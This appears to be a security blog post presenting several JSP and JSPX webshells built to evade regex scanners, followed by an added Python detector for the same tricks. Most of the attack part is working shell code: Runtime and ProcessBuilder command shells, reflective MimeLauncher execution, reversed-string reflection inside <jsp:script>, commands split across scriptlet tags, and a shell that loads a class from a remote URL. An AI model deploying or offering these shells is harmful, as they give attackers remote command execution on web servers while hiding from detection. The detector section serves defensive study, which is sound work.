Evading detection with built-in functions / MimeLauncher + reflection

A plain JSP shell takes a GET parameter and passes it straight to Runtime's exec method to run a command. If a scanner's regex matches `Runtime.getRuntime().exec`, a shell like this is trivially flagged and removed.


<%
if("023".equals(request.getParameter("pwd"))){
   java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
   int a = -1; byte[] b = new byte[2048]; out.print("<pre>");
   // only the bytes read in this iteration are converted, not the whole stale buffer
   while((a=in.read(b))!=-1){ out.println(new String(b, 0, a));
   }
   out.print("</pre>"); } %>

ProcessBuilder can stand in for Runtime.getRuntime().exec(), because exec() ultimately delegates to ProcessBuilder anyway. Using ProcessBuilder directly removes the `Runtime` token from the source and so slips past a regex written for it.


<%@ page import="java.io.*" %>
<%
  String pentest = request.getParameter("pentest");
  Process process = new ProcessBuilder(new String[]{pentest}).start();
  InputStream is = process.getInputStream();
  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
  String r = null;
  while((r = bufferedReader.readLine())!=null){
    response.getWriter().println(r);
  }
%>

MimeLauncher.run() calls getRuntime internally, so it can also be used for execution; it is package-private in sun.net.www, however, so it has to be reached through reflection.


<%@ page import="java.io.*" %>
<%@ page import="java.net.URLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="sun.net.www.MimeEntry" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page language="java" pageEncoding="UTF-8" %>
<%
    String cmd = request.getParameter("cmd");
    URLConnection urlConnection = new URL("http://127.0.0.1%s").openConnection();
    MimeEntry mimeEntry = new MimeEntry("naihe");
    Class meClass = MimeEntry.class;
    Field field = meClass.getDeclaredField("command");
    field.setAccessible(true);

    Field field2 = meClass.getDeclaredField("tempFileNameTemplate");
    field2.setAccessible(true);
    field2.set(mimeEntry,"naihe%s567");

    InputStream inputStream = new InputStream() {
        @Override
        public int read() throws IOException {
            return -1;
        }
    };

    Class mimeClass = Class.forName("sun.net.www.MimeLauncher");
    Constructor mimeCon = mimeClass.getDeclaredConstructor(MimeEntry.class,URLConnection.class,
            InputStream.class,String.class,String.class);
    mimeCon.setAccessible(true);
    Thread thread = (Thread) mimeCon.newInstance(mimeEntry, urlConnection, inputStream, "0","0");
    Field field3 = mimeClass.getDeclaredField("execPath");
    field3.setAccessible(true);
    field3.set(thread,cmd);
    Method m = mimeClass.getDeclaredMethod("run");
    m.setAccessible(true);
    m.invoke(thread);
%>

CDATA feature + reflection + string reversal

This relies on a jspx feature: jspx is the XML form of a JSP file, and inside it `<jsp:script>` can be used in place of `<% %>`, so a scanner looking only for scriptlet delimiters sees no code.


<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!
public static String reverseStr(String str){
    String reverse = "";
    int length = str.length();
    for (int i = 0; i < length; i++){
        reverse = str.charAt(i) + reverse;
    }
    return reverse;
}
%>
<jsp:script>
String x = request.getParameter("x");
if(x!=null){
    // the reversed literals decode to java.lang.Runtime, getRuntime and exec
    Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
    Method gr = rt.getMethod(reverseStr("emitnuRteg"));
    Method ex = rt.getMethod(reverseStr("cexe"), String.class);
    Process e = (Process) ex.invoke(gr.invoke(null),  x);
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b, 0, a));
    }
    out.print("</pre>");
}
</jsp:script>

JSP webshell: splitting across multiple tags

When Tomcat compiles the page, the bodies of several scriptlet tags of the same kind are emitted one after another into the same generated method. With the trimDirectiveWhitespaces attribute set, the `\n` between them is dropped as well, so the separate tags are concatenated into a single line of code, which no longer looks like `Runtime.getRuntime().exec` in the source file.


<%@ page contentType="text/html;charset=UTF-8" language="java"%>
<%@ page trimDirectiveWhitespaces='true'%>
<%Runtime%>
<%.getRuntime()%>
<%.exec(request.getParameter("test"));%>

JSP: remote class loading + string reversal

Loading the class file from a remote URL leaves few signatures in the page itself and has something of the built-in-function flavour, though not entirely. The code:


<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.lang.reflect.Method" %>
<%!
public static String reverseStr(String str){
    String reverse = "";
    int length = str.length();
    for (int i = 0; i < length; i++){
        reverse = str.charAt(i) + reverse;
    }
    return reverse;
}
%>
<%
  String cmd = request.getParameter("id");
  URL url = new URL("http://127.0.0.1:8000/");
  URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
  System.out.println(classLoader.getParent());
  // reversed literal decodes to the class name com.demo.test; the method name decodes to runs
  Class shell = classLoader.loadClass(reverseStr("stet.omed.moc"));
  Object object =  shell.newInstance();
  Method dm = shell.getMethod(reverseStr("snur"),String.class);
  Object invoke = dm.invoke(object, cmd);
  response.getWriter().println(invoke);
%>
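Each of the tricks above (ProcessBuilder instead of Runtime, the reflective MimeLauncher call, `<jsp:script>` with reversed string literals, scriptlets split across tags with trimDirectiveWhitespaces, and URLClassLoader loading a remote class) defeats a scanner that only runs a regex over the raw file. The detector below is an added example written for this page, not code from the original post: it extracts every executable region of a JSP/JSPX page, concatenates scriptlet bodies the way Tomcat's generated servlet does, decodes string literals whose reverse is a sensitive Java name, and only then applies its rules. The rule names, the SENSITIVE_NAMES list and the three sample pages are my own constructions.

```python
"""Static triage of JSP/JSPX source for the evasion tricks discussed above.
Added example for this page; rule names, name list and samples are assumptions."""
import re

# Executable regions: scriptlets <% %>, declarations <%! %>, expressions <%= %>
# and the XML-syntax <jsp:script>/<jsp:scriptlet> element. Directives <%@ %>
# are parsed separately because they carry settings, not code.
CODE_REGION_RE = re.compile(
    r"<%(?!@)(?P<kind>[!=]?)(?P<body>.*?)%>"
    r"|<jsp:script(?:let)?[^>]*>(?P<script>.*?)</jsp:script(?:let)?>",
    re.S,
)
DIRECTIVE_RE = re.compile(r"<%@(.*?)%>", re.S)
STRING_LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Java names that have no business appearing reversed inside a string literal.
SENSITIVE_NAMES = {
    "java.lang.Runtime", "getRuntime", "exec", "ProcessBuilder",
    "MimeLauncher", "URLClassLoader", "loadClass", "defineClass",
}

RULES = [
    ("runtime-exec", re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(")),
    ("process-builder", re.compile(r"new\s+ProcessBuilder\s*\(")),
    ("mime-launcher", re.compile(r"Mime(?:Launcher|Entry)")),
    ("class-forname", re.compile(r"Class\s*\.\s*forName\s*\(")),
    ("reflective-exec", re.compile(r'getMethod\s*\([^;]*"exec"')),
    ("remote-class-loading", re.compile(r"new\s+URLClassLoader\s*\(")),
    ("set-accessible", re.compile(r"\.setAccessible\s*\(\s*true\s*\)")),
    ("request-param", re.compile(r"request\s*\.\s*getParameter\s*\(")),
]
EXEC_RULES = {"runtime-exec", "process-builder", "mime-launcher",
              "reflective-exec", "remote-class-loading"}


def extract_code(page):
    """Return (directive bodies, [(kind, code)]) with CDATA wrappers removed."""
    directives = [m.group(1).strip() for m in DIRECTIVE_RE.finditer(page)]
    regions = []
    for m in CODE_REGION_RE.finditer(page):
        if m.group("script") is not None:
            kind, body = "", m.group("script")
        else:
            kind, body = m.group("kind"), m.group("body")
        regions.append((kind, body.replace("<![CDATA[", "").replace("]]>", "")))
    return directives, regions


def decode_reversed_literals(code):
    """Rewrite literals whose reverse is a sensitive name; return (code, names)."""
    names = set()

    def restore(m):
        rev = m.group(1)[::-1]
        if rev in SENSITIVE_NAMES:
            names.add(rev)
            return '"%s"' % rev
        return m.group(0)

    return STRING_LITERAL_RE.sub(restore, code), names


def scan_jsp(page):
    """Return the sorted list of indicator names found in one JSP/JSPX page."""
    findings = set()
    directives, regions = extract_code(page)
    if any("trimDirectiveWhitespaces" in d for d in directives):
        findings.add("trim-whitespace-directive")
    # A scriptlet with no statement terminator or block is a fragment that only
    # becomes a statement once Tomcat joins it with its neighbours.
    fragments = [b for k, b in regions if k == "" and b.strip() and not re.search(r"[;{]", b)]
    if len(fragments) >= 2:
        findings.add("fragmented-scriptlets")
    # Tomcat emits every scriptlet body into one _jspService method, so match
    # on the concatenation rather than on each tag in isolation.
    joined, reversed_names = decode_reversed_literals("".join(b for _, b in regions))
    findings.update("reversed-literal:" + n for n in reversed_names)
    findings.update(name for name, pat in RULES if pat.search(joined))
    return sorted(findings)


def is_likely_webshell(page):
    """Request-controlled input alongside a command or class-loading sink."""
    findings = set(scan_jsp(page))
    return "request-param" in findings and bool(findings & EXEC_RULES)


# Constructed samples in the shapes discussed above (not the post's files).
SAMPLE_SPLIT = (
    '<%@ page trimDirectiveWhitespaces="true"%>\n'
    '<%Runtime%>\n<%.getRuntime()%>\n<%.exec(request.getParameter("t"));%>\n'
)
SAMPLE_REVERSED = (
    "<%! static String rev(String s){ return new StringBuilder(s).reverse().toString(); } %>\n"
    "<jsp:script><![CDATA[\n"
    'Class rt = Class.forName(rev("emitnuR.gnal.avaj"));\n'
    'Method ex = rt.getMethod(rev("cexe"), String.class);\n'
    'ex.invoke(rt.getMethod(rev("emitnuRteg")).invoke(null), request.getParameter("x"));\n'
    "]]></jsp:script>\n"
)
SAMPLE_BENIGN = (
    '<%@ page contentType="text/html;charset=UTF-8" %>\n'
    '<% String name = request.getParameter("name"); if (name == null) { name = "guest"; } %>\n'
    "<p>Hello <%= name %> at <%= new java.util.Date() %></p>\n"
)

if __name__ == "__main__":
    for label, sample in (("split", SAMPLE_SPLIT), ("reversed", SAMPLE_REVERSED), ("benign", SAMPLE_BENIGN)):
        print(label, is_likely_webshell(sample), scan_jsp(sample))
```

The design point is normalisation before matching: the split sample only matches `runtime-exec` after the bodies are joined, and the jspx sample only matches `reflective-exec` after the reversed literals are decoded, while a benign page that merely reads a request parameter stays below the verdict threshold. Literal reversal is one obfuscation of many, so in practice the decode step should also try the other encodings you expect to see (base64, hex, char arithmetic) before the rules run.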

Disclaimer

This article is for technical discussion and study only. Any direct or indirect consequences or losses caused by using the information provided here are the sole responsibility of the user; neither this platform nor the publisher accepts any liability for them.